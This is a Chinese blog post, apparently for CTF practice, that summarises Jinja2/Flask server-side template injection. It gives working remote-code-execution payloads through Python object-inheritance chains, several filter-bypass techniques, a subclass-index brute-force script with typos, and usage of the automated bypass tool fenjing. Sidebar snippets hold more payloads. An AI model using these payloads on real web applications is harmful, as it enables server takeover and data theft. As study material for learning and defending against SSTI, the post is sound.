SSTI知识点汇总

已于 2025-02-25 15:40:39 修改
阅读量864 收藏 23
点赞数 8
文章标签: 安全 web安全
于 2025-02-23 21:35:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Takagiapa/article/details/145347313
版权

        以前写BaseCTFweek3的web时总结过一次,这里系统的再重写一遍

什么是SSTI?

        SSTI是一种发生在服务器端模板中的漏洞。当用户的输入返回时会经过一个模板渲染,SSTI漏洞就是恶意用户插入了可以破坏模板的语句,导致了敏感信息泄露、rce等问题。           

        服务器的模板又很多种,不同的语言会有不同的模板框架。   

        所以SSTI并不只有一种方式,我们平常多遇到的是python的模板

SSTI的形成原因

        其实成因很简单,就是写后端代码的程序员偷懒,用render_template_string解析字符串代替了render_template的渲染。

        做题的时候可以通过wapplayzer插件,查看框架和语言,一般是Flask和Python的话就是ssti没跑了

SSTI的具体实现方法

        这里以python的模板为例

        在这些框架中存在很多类,包括可以做到RCE的类。

        所以我们的目标就是要通过模板操作到可以进行RCE的类

        那么我们输入什么才会被当成模板注入呢?

       因为模板渲染的时候会把"{ {}}"包裹的内容当做变量解析替换。比如,{ {2*2}}会被解析成4所以,我们需要用  { {恶意代码}}  的形式来进行SSTI

        (所以{ {2*2}}也被用作检测SSTI漏洞的方法)

        接下来就是SSTI的具体实现方法了

        这里借用一下我之前写过的博客BaseCTF_web_week3-优快云博客

        这里是一些魔术方法

__class__   :返回类型所属的对象。
__base__   :返回该对象所继承的父类
__mro__     :返回该对象的所有父类
__subclasses__()  获取当前类的所有子类
__init__  类的初始化方法
__globals__  对包含(保存)函数全局变量的字典的引用

        假设我们知道一个当前类,通过__class__返回对象,然后用__mro__或者__base__返回父类,直到父类为object类(所有的类都是object类的子类),再用__sublasses__返回所有的子类,这样就能找到存在rce的类啦!

        以下是一些当前类的表示方式

''.__class__

().__class__

[].__class__

"".__class__

{}.__class__

        (ctfshow_web361) 

        所以我们可以构造{ {''.__class__.__base__.__subclasses__}}查看所有类

        可以进行rce的类是——"os._wrap_close",所以我们需要找到这个类的序号

        可以复制粘贴去记事本,搜索os._wrap_close一下具体的位置(一般在130多)我这里是132

        也可以用这个脚本,记得改一下pyload和url

import requests
url =input('请输入URL链接:)
for i in range(500):
data ={"name":
"{{O)._class_._base_.__subclasses_()["+str(i)+"]._init_._globals_['__builtins_1}}"]
try:
response = requests.posf(url,data=data)
#print(response.text)
if response.status_code == 200:if 'popen' in response.text:print(i)
except:
pass

         之后用__init__初始化这个类,用__globals__寻找popen函数后可以直接命令执行,记得最后要加一个read()

        构造

?name={
  
  {''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat%20/flag').read()}}

        这个格式稍微要记一下,目前只知道可以用os._wrap_close的popen 

        popen后的括号里直接写命令,不需要system

        这样我们就成功通过SSTI漏洞进行RCE了

SSTI的绕过姿势

        上面上述的是最最基本的一种实现方法,现在是一些绕过手法

        绕过数字

                上述pyload用到了132,ban了数字之后我们有两种解决方案

                1.是采用另一种pylaod

{{a.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

采用了builtins模块,比用os_wrap_close更加方便

                2.采用全角数字

                        0123456789(不知道原理)

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

       

         用request绕过

                request可以获得请求的相关信息,通过这个特性可以做到绕过(其实用''也可以做到绕过)

例如
{{''.__class__}} ==> {{''[request.args.t1]}}&t1=__class__

__class__ ==> _''_cla''ss_''_

                过滤    '  '          

                拿之前讲过的__builtins__举例

{{a.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}

                如果ban了'',就说明__builtins__和__import__的使用会被限制,这里就可以用request.args.x(x为get的参数)来避免''被检测到

                pyload如下

{{a.__init__.__globals__[request.args.x].eval(request.args.y)}}&x=__builtins__&y=__import__("os").popen("cat /flag").read()

                

        同理,也可以用于绕过其他字符

        值得一提的是,如果args被ban了,request.args.x可以替换成request['values']['x']的形式

        如果这时  ' '  也被ban了,可以用request.cookies.x代替,不过上传参数要传在cookie中
        (注意cookies这里需要加 ; )

                        chr()拼接解决request被ban

        可以用chr()拼接,可是我们不能直接使用chr(),要用之前的方法通过继承链走到chr()

一些chr()的构造方式
"".__class__.__base__.__subclasses__()[x].__init__.__globals__['__builtins__'].chr
get_flashed_messages.__globals__['__builtins__'].chr
url_for.__globals__['__builtins__'].chr
lipsum.__globals__['__builtins__'].chr
x.__init__.__globals__['__builtins__'].chr  (x为任意值)

         然后用字符串chr接收,之后就可以用chr()函数了

BaseCTF week4 复读机wp(为了观感把绕过用的''去掉了)

{% set chr= ''['__class__']['__base__']['__subclasses__']()[137]['__init__']['__globals__']['__builtins__']['chr']%}
{% set cmd='cat '~chr(47)~'flag' %}
{%print(''['__class__']['__base__']['__subclasses__']()[137]['__init__']['__globals__']['popen'](cmd)['read']())%}

                        

         . 绕过

                可以用atter()绕过,也可以用[ ]绕过(这里不做展示)
        

|attr("__class__")就相当于.__class__

可以借鉴一下这个pyload

{{lipsum|attr("__globals__")|attr("get")("os")|attr("popen")("whoami")|attr("read")()}}

这里这个pyload是改自
{{lipsum._globals_.get("os").popen('whoami').read()}}

这里值得注意的是(不用get)
{{lipsum._globals_.os.popen('whoami').read()}}是成立的

但是,
{{lipsum|attr("__globals__")|attr("get")("os")|attr("popen")("whoami")|attr("read")()}}
如果不加get,就会失败

         {{绕过

                不能用{{}},可以用{%%}代替,不过{%%}没有显示,要加一个print

        

SSTI终极工具——fenjing

        全自动化绕过,只需要直接执行命令即可(仅支持http)

       kali中安装

pip install fenjing

        使用

python -m fenjing scan --url 'http://...'

打开网站ui
python -m fenjing webui

        讲的比较简单建议看下方文章 

        Fenjing 专为CTF设计的Jinja2 SSTI全自动绕WAF脚本 - 🔰雨苁ℒ🔰

        不过工具归工具,还是要有一些硬实力的,也遇到过fenjing找不出漏洞点的情况

小结

        忙前忙后总算写完了这篇博客,还有很多绕过姿势没讲,不过有了fenjing,更加难的绕过应该都能迎刃而解

liernian
关注
SSTI模板注入及绕过姿势(基于Python-Jinja2)
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
[SSTI自动化工具]Fenjing(焚靖)Windows下载报错及正确安装及实际CTF题目中运用
5fn
07-17 3585
本篇文章旨在说明Windows系统上安装fenjing的报错及解决方案,以及展示两种方法----它的基本终端上的用法,以及flask实现框架如何运用在CTF实战题目上并得到flag。
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
[SSTI自动化工具]Fenjing安装说明
m0_61155226的博客
07-11 1万+
SSTI自动化工具
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 3909
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
WEB SSTI(qsnctf)
2301_76718200的博客
11-30 1148
发现是SSTI模板注入使用fenjing工具自动化SSTI模板注入。发现没有没事用,干脆直接查看更目录下所以东西。cat查看flag发现没有显示出什么。ls /查看根目录下有什么。以下是我已经安装好了。
渗透测试基础知识点汇总
qiangulf的博客
11-10 791
目录WEB面试题网络网络和协议基础网络windows命令net和桥接和仅主机的区别什么是IP地址IP地址由哪两个部分组成OSI七层模型OSI七层模型中每一层对应的设备是什么TCP三次握手和四次挥手TCP&UDP的区别ABC类IP地址HTTP协议和HTTPS协议的区别TLS是什么DNS协议,DNS解析的流程GET与POST区别Web网站组成系统命令基础LinuxLinux 发行版本目录Linux 命令Linux 命令三剑客什么是CSS常用windows命令服务你搭建过哪些服务?web服务的日志路径在什么地方d
ctfshow ssti注入
最新发布
03-20
每个部分结合引用中的知识点,比如引用3提到的MVC框架,说明输入如何进入视图层导致漏洞。引用1和2提到的注入原理和利用方法,可以支撑解题思路中的步骤。</think>### CTFShow SSTI注入解题思路与实战技巧 #### 一...
[安洵杯 2020]Normal SSTI详细解法(Unicode编码绕过)
2301_76690905的博客
11-07 1260
引用popen,查目录url={%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22os%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u006c\u0073\u0020\u002f%22)|等效于{{””.__class__}}
CTF知识总结,写的不错
10-29
以上内容是CTF竞赛中常见的技术点,掌握这些知识将有助于解决各种类型的网络安全问题。在实际的CTF比赛中,参赛者需要综合运用这些技巧,结合实际场景进行攻防对抗。同时,随着技术的发展,新的漏洞和防御策略不断...
ssti总结转载
kuzemax的博客
07-29 419
一、初识SSTI1、什么是SSTISSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实际上这两者的思路都是相同的,因此可以类比来分析。2、引发SSTI的真正原因render_template渲染函数的问题渲染函数在渲染的时候,往往对用户输入的变量不做渲染。
fenjing:秒杀ssti漏洞!顺带提供绕waf脚本教程!
m0_67236448的博客
02-24 735
开始分析,在分析结束后弹出成功getshell,接下来就可以为所欲为了,可以看到我这里执行了抓取flag的命令。的JinjaSSTI绕过WAF的全自动脚本,可以自动攻击给定的网站或接口。直接在目录呼出命令行开始启动脚本,使用如下命令。这两个任意一个框都可以注入,但是有以下waf。我尝试普通扫描无法绕过,于是决定手动构造脚本。我们将这个脚本丢在fenjing的目录下。首先找到我们下载的fenjing安装包。我拿ctfshow的ssti一道题举例。我拿我们校队之前招新的一道题目来举例。之后回车,就无脑跑了。
SSTI模板注入总结
热门推荐
Manuffer的博客
10-13 1万+
文章目录一、初识SSTI二、判断SSTI类型三、常用类1、__class__2、__bases__3、__subclasses__()4、类的知识总结(转载)5、常见过滤器(转载)四、CTF例题[BJDCTF]The mystery of ip[Bugku]Simple_SSTI_1 一、初识SSTI 1、什么是SSTISSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实
代码审计-Python Flask
梦想闹钟
10-14 914
flask的session是通过加密后保存在cookie中的,有加密就需要有解密用的密钥,只要用到了flask的session模块,就一定要配置’SECRET_KEY’这个全局宏。jinja2是Flask作者开发的一个模板系统,起初是仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活,快速和安全等优点被广泛使用。也可以在攻击成功后生成并返回对应的payload。焚靖既可以作为命令行程序使用,也可以作为python库导入到脚本中,其还提供一个网页UI方便不熟悉命令行的选手使用。
ssti小总结
cuddlylm的博客
04-09 3204
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题. 1. 几种常用于ssti的魔术方法 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类
【小工具发现系列-1】fenjin(焚靖)
m0_73683234的博客
03-17 4315
之前出了一道常规ssti题目,被人用工具秒了,问人要到之后试了一下,发现确实香(jianjia2的ssti要被秒破了)超长的payload就给打出来了(这是真的香,彻底解放双手+不动脑子)使用scan可以自动的扫描网站,最后反弹一个shell。如果要更详细一点可以查看crack的--help。这里我使用了ssti-lab 的最后的混合过滤。QQ:2912055973 欢迎大家讨论。安装过程有很多,我选择了相对简单的方法。主环境安装焚靖之后,使用方法也很简单。这个小工具就介绍完啦(很香)
SSTI模板注入CTF刷题合集
2301_76690905的博客
11-08 933
过滤下划线,单双引号,还有很迷的一个过滤,单纯的{{会过滤,但是如果GET方法有{{,request.cookies.c,同时加上cookie,这个{{就不会被过滤。
SSTI---总结
wwwwyyyrre的博客
06-12 2712
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
CTF_Web:从0学习Flask模板注入(SSTI
AFCC_的博客(Web_Dog)
08-30 6186
0x01 前言 最近在刷题的过程中发现服务端模板注入的题目也比较常见,这类注入题目都比较类似,区别就在于不同的框架、不同的过滤规则可能需要的最终payload不一样,本文将以Flask为例学习模板注入的相关知识,也是对自己学习的一个记录。 0x02 Flask简介 Flask是一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。优点就在于开发简单,代码量少,很多工作都在框架中被实现了。他与Django不同于Django是一个全能型框架,通常用于编写大型的网站。
cyclegan的生成器训练2次
01-21
### 如何在 CycleGAN 中实现生成器的二次训练 为了理解如何在 CycleGAN 中对生成器进行两次训练,先回顾一下 CycleGAN 的基本结构和工作原理。CycleGAN 是一种特殊的 GAN 架构,旨在解决不同域之间的无监督图像到图像翻译问题[^2]。 #### 生成器的设计与功能 CycleGAN 使用两个生成器 \(G\) 和 \(F\), 它们分别负责将 A 域的数据映射至 B 域 (\(A \rightarrow B\)) 和反向操作 (\(B \rightarrow A\)). 这种双向转换机制不仅促进了更有效的特征学习,还引入了一致性损失 (cycle consistency loss),即如果一张图片从一个域被转换到另一域再转回来,则最终结果应尽可能接近原始输入[^3]. #### 训练过程概述 在一个标准的训练周期内,每个生成器都会经历如下流程: 1. **前向传播**: 输入来自源域的真实样本并获得输出; 2. **计算对抗损失**: 将此输出传递给相应的判别器来评估其真实性得分; 3. **应用一致性约束**: 对于每一对互为镜像的任务(如 \(A \leftrightarrow B\)),还需考虑额外的一致性惩罚项以保持循环闭合; 对于所谓的“二次训练”,实际上是指在整个训练过程中重复上述步骤多次迭代直至收敛。具体来说,在每次完整的 epoch 结束之后,可以根据当前模型的表现调整超参数或改变某些设置继续新一轮的学习。这种做法有助于进一步优化模型性能,尤其是在初始阶段可能未充分探索整个解空间的情况下[^5]。 #### 实现细节 下面给出一段 Python 伪代码片段展示了一个简单的双轮次训练框架: ```python for n_epochs in range(num_initial_epochs): # 首轮训练 for data_A, data_B in dataloader: optimizer_G.zero_grad() fake_B = generator_AB(data_A) recov_A = generator_BA(fake_B) adv_loss = criterion_adversarial(discriminator_B(fake_B)) cycle_loss = criterion_cycle(recov_A, data_A) total_loss = lambda_adv * adv_loss + lambda_cyc * cycle_loss total_loss.backward() optimizer_G.step() # 调整学习率或其他配置... adjust_learning_rate(optimizer_G, new_lr=0.0001) for n_epochs in range(additional_training_epochs): # 第二轮训练 for data_A, data_B in dataloader: ... ``` 这段代码展示了如何执行两轮不同的训练期数 (`num_initial_epochs` 和 `additional_training_epochs`) 来完成所谓 “二次训练”。注意这里假设存在某种形式的学习速率衰减策略或者其他改进措施应用于第二轮之前[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值